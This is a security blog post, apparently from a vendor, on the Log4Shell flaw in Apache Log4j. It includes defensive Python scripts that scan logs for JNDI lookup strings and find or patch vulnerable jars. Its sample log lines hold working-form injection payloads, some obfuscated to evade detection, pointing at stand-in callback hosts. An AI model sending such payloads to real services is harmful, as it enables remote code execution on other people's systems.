Log4j Vulnerability
NIST's National Vulnerability Database has published CVE-2021-44228, a critical zero-day vulnerability in the Apache Log4j logging library that is already being exploited in the wild.
The Apache Log4j utility is a popular and widely used component for logging. On December 9, 2021, a vulnerability was disclosed that lets an attacker execute arbitrary code on any system that logs attacker-controlled input through Apache Log4j 2 versions 2.0-beta9 through 2.14.1. The flaw is in Log4j's message lookup feature: if a string of the form ${jndi:ldap://attacker-host/x} appears in any value the application logs, such as a User-Agent header or a form field, Log4j resolves the JNDI reference over the network and can load and run attacker-supplied code.
Why this is Important
Many consider this one of the most serious vulnerabilities discovered to date. It carries a CVSS score of 10.0, the maximum possible. It is a remote code execution (RCE) vulnerability that is trivial to exploit, and a successful attack lets the attacker run arbitrary code on the host: install malware, exfiltrate sensitive data, or take full control of the machine.
“one of the most serious I’ve seen in my entire career, if not the most serious” – CISA Director Jen Easterly, the top U.S. cybersecurity defense official.
Apache Log4j is a Java-based logging utility maintained by the Apache Logging Services project of the Apache Software Foundation. It is open source, widely embedded in commercial and in-house software, and depended on, directly or transitively, by a large number of applications and services. Anything from enterprise control systems and vehicle navigation to web servers and consumer electronics may be affected, and because Log4j runs wherever Java runs, it is present on Windows, Linux and Apple’s macOS alike. The hard part is inventory: identifying which systems contain a vulnerable copy is difficult because Log4j is often bundled several layers deep inside other software or in undocumented directories.
Attackers have already adapted botnet malware to hijack compromised hosts for large-scale attacks on network infrastructure, while others have installed cryptocurrency miners on the systems they compromised.
What to Expect in the Coming Days, Weeks, Months
Since this logging software is used across the internet, the impact is expected to be widespread. At the time of this posting there are active and ongoing attempts to exploit this vulnerability, and the attacks are expected to continue.
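Exploitation attempts are visible in ordinary access logs as lookup strings embedded in whatever field the application logs, typically the User-Agent, the URL or another request header. The following Python script is an added example written for this post, not Crest Data code: it scans web-server log lines for the ${jndi: pattern, first undoing the URL-encoding and the ${lower:...} and ${...:-x} lookup tricks attackers use to get past a literal string match, and reports the source IP and the callback host. The log lines and the 198.51.100.x addresses are constructed samples, not real traffic.

```python
from __future__ import annotations

import re
import urllib.parse

# Constructed sample access-log lines (Apache combined format). Line 1 is benign; the rest carry
# the lookup string in the User-Agent or the query string, in the obfuscated forms seen in the wild.
# 198.51.100.0/24 is a documentation address range, not a real attacker.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 512 "-" "-"
"""

# Lookup wrappers that evaluate to their inner text and are used purely for evasion:
# ${lower:j} / ${upper:J}, and the default-value form ${env:X:-j} or ${::-j}.
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper)\s*:\s*([^{}]*)\}", re.I)
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI_MARK = re.compile(r"\$\{\s*jndi\s*:", re.I)
JNDI_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)://([^/}\s]+)", re.I)


def normalize(s: str, max_rounds: int = 5) -> str:
    """Undo URL-encoding and collapse evasion wrappers until the string stops changing.
    Nested wrappers such as ${lower:${upper:j}} resolve inside-out across rounds."""
    for _ in range(max_rounds):
        prev = s
        s = urllib.parse.unquote(s)
        s = LOOKUP_CASE.sub(r"\1", s)
        s = LOOKUP_DEFAULT.sub(r"\1", s)
        if s == prev:
            break
    return s


def find_jndi_attempts(log_text: str) -> list:
    """Return one record per log line that contains a JNDI lookup after normalization."""
    hits = []
    for line in log_text.splitlines():
        norm = normalize(line)
        if not JNDI_MARK.search(norm):
            continue
        t = JNDI_TARGET.search(norm)
        hits.append({
            "src_ip": line.split(" ", 1)[0],
            "scheme": t.group(1).lower() if t else None,
            "target": t.group(2) if t else None,  # attacker's callback host[:port]
            "normalized": norm,
        })
    return hits


if __name__ == "__main__":
    for h in find_jndi_attempts(SAMPLE_LOG):
        print(f'{h["src_ip"]} -> {h["scheme"]}://{h["target"]}')
```

Match on the normalized string, not the raw line: three of the four attempts in the sample would slip past a literal search for ${jndi:. A hit means an attempt, not a compromise. Confirm impact by checking whether the logging host actually resolved or connected to the callback address; outbound LDAP, RMI or DNS traffic from an application server to an unknown host is the strongest single indicator.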
One of the first attacks using the vulnerability involved the 3D world-building game Minecraft. Cybercriminals were able to take control of a server before Microsoft, which owns Minecraft, could address and patch the flaw. A bug of this kind is called a zero-day vulnerability: it became publicly known, and exploitable, before a patch existed.
Similar attacks should be expected to surface soon. Much of the tech industry is working around the clock to ship patches while cybercriminals are actively exploiting the flaw. The US government has warned companies to expect cyber attacks over the holidays, to examine their current cybersecurity posture, and to implement best practices and mitigations to manage the risk.
The impact of this vulnerability is far-reaching: Log4j reportedly affects even the Mars rover mission, and vulnerable copies will remain in networks, devices and machines for years to come. Ransomware campaigns and nation-state attacks that build on this vulnerability may follow soon, leaving everyone on high alert.
How to Detect and Mitigate, and Next Steps
This critical vulnerability requires immediate action. Apache Log4j 2 versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 are vulnerable. If you run any of these, upgrade urgently to the latest release, in which the vulnerability has been addressed. More details can be found in the NVD entry at https://nvd.nist.gov/vuln/detail/CVE-2021-44228.
At Crest Data, we are actively helping our customers address this vulnerability and would like to share what we have learned so you can take similar measures in your own environment.
Detect:
There are two methods you can use immediately to determine whether your systems are vulnerable, that is, whether they contain a vulnerable copy of log4j,
Manual – search your product's source tree, build files (pom.xml, build.gradle) and deployed artifacts for the log4j library (log4j-core) and for third-party libraries that bundle log4j internally.
Automated – use software composition analysis (OSS scan) tools such as WhiteSource or Snyk on the product's source and build manifests to detect direct and transitive log4j dependencies.
Mitigate:
Mitigate future exploitation of this flaw by performing the following,
Upgrade the log4j library, wherever your product's source code uses it, to the latest version (v2.16.0 at the time of writing).
If log4j is used internally by a third-party library that your product depends on, upgrade that library to a release that itself uses log4j v2.16.0.
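The two detection methods above find log4j in source and build metadata; deployed systems also need an on-disk check, since the vulnerable class travels inside jars, wars and fat jars that no manifest lists. The Python script below is an added example written for this post (not Crest Data code and not an Apache tool). It walks a directory tree, opens every jar, war and ear including archives nested inside archives, reads the log4j-core version from its Maven pom.properties, classifies it against the version ranges given above, and records whether JndiLookup.class is present. It also implements the interim mitigation from Apache's own advisory for hosts that cannot upgrade yet: removing JndiLookup.class from the jar. The sample tree it scans is constructed inline with placeholder class bytes, and FIXED_BACKPORTS lists the Apache back-port releases (2.3.1, 2.3.2, 2.12.2) that are fixed despite falling inside the numeric ranges; the post itself does not mention them.

```python
from __future__ import annotations

import io
import re
import tempfile
import zipfile
from pathlib import Path

# Entries inside log4j-core that identify the library and its version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Apache back-port releases that are fixed although they fall inside the numeric ranges
# (from Apache's Log4j security page; the post itself does not list them).
FIXED_BACKPORTS = {"2.3.1", "2.3.2", "2.12.2"}


def parse_version(v: str):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Qualifiers are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def is_vulnerable_version(v: str) -> bool:
    """CVE-2021-44228 ranges as the advisory lists them: 2.0-beta9..2.12.1 and 2.13.0..2.15.0.
    Earlier 2.0 betas are flagged as well because the qualifier is dropped (conservative)."""
    t = parse_version(v)
    if v in FIXED_BACKPORTS or t is None or t[0] != 2:
        return False
    return t <= (2, 12, 1) or (2, 13, 0) <= t <= (2, 15, 0)


def scan_archive(data: bytes, name: str, findings: list, depth: int = 0) -> None:
    """Inspect one archive and recurse (bounded) into archives nested inside it: war, ear, fat jar."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        # The version decides when it is known (fixed releases still ship JndiLookup.class);
        # a shaded copy with no pom.properties is flagged on the class alone, for review.
        findings.append({"archive": name, "version": version, "jndi_lookup_present": has_jndi,
                         "vulnerable": is_vulnerable_version(version) if version else has_jndi})
    for inner in sorted(names):
        if depth < 3 and inner.lower().endswith(ARCHIVE_SUFFIXES):
            scan_archive(zf.read(inner), f"{name}!/{inner}", findings, depth + 1)


def scan_path(root) -> list:
    """Walk a directory tree and scan every archive in it; one finding per log4j-core copy."""
    findings: list = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_archive(p.read_bytes(), str(p), findings)
    return findings


def strip_jndi_lookup(jar_path, out_path) -> bool:
    """Copy jar_path to out_path without JndiLookup.class (Apache's interim mitigation for
    hosts that cannot upgrade yet). Returns True if the class was present and removed."""
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(out_path, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    return removed


def fake_log4j_core(version: str) -> bytes:
    """Constructed fixture laid out like log4j-core; placeholder bytes, not the real artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def run_demo() -> dict:
    """Scan a constructed tree (a loose 2.14.1 jar plus a war bundling a 2.16.0 jar), then strip."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "lib").mkdir()
        loose = Path(d, "lib", "log4j-core-2.14.1.jar")
        loose.write_bytes(fake_log4j_core("2.14.1"))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", fake_log4j_core("2.16.0"))
        Path(d, "app.war").write_bytes(war.getvalue())
        findings = scan_path(d)
        stripped = Path(d, "lib", "log4j-core-2.14.1-stripped.jar")
        removed = strip_jndi_lookup(loose, stripped)
        after: list = []
        scan_archive(stripped.read_bytes(), str(stripped), after)
        return {"findings": findings, "removed": removed, "after_strip": after}
```

Two caveats. A fixed release such as 2.16.0 still contains JndiLookup.class, so the class alone is not evidence of exposure; the version decides when it is known, and the class is only used to flag shaded copies that carry no pom.properties. Conversely, a stripped jar still reports its old version, so version-based scanners (this one included) will keep flagging it; record the mitigation and still schedule the upgrade, which is the actual fix.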
Recommended Next steps:
Scan the product's source code with OSS scan tools (WhiteSource, Snyk) to confirm that no vulnerable log4j version remains, directly or through a third-party dependency.
Upgrade to the newer version of the product in which this vulnerability has been patched.
Crest Data is proactively engaging with customers to mitigate the risk and will provide additional information as the situation evolves. We upgraded all our apps in record time to secure our customers’ environments. We scanned all our apps, identified the affected components, and are working with our customers to ensure the remediation steps are taken to resolve this issue.
Please contact Crest Data support for any questions or further assistance with applying the mitigation steps described above.
Learn More and Stay On Top of Updates
Start with these resources for updates,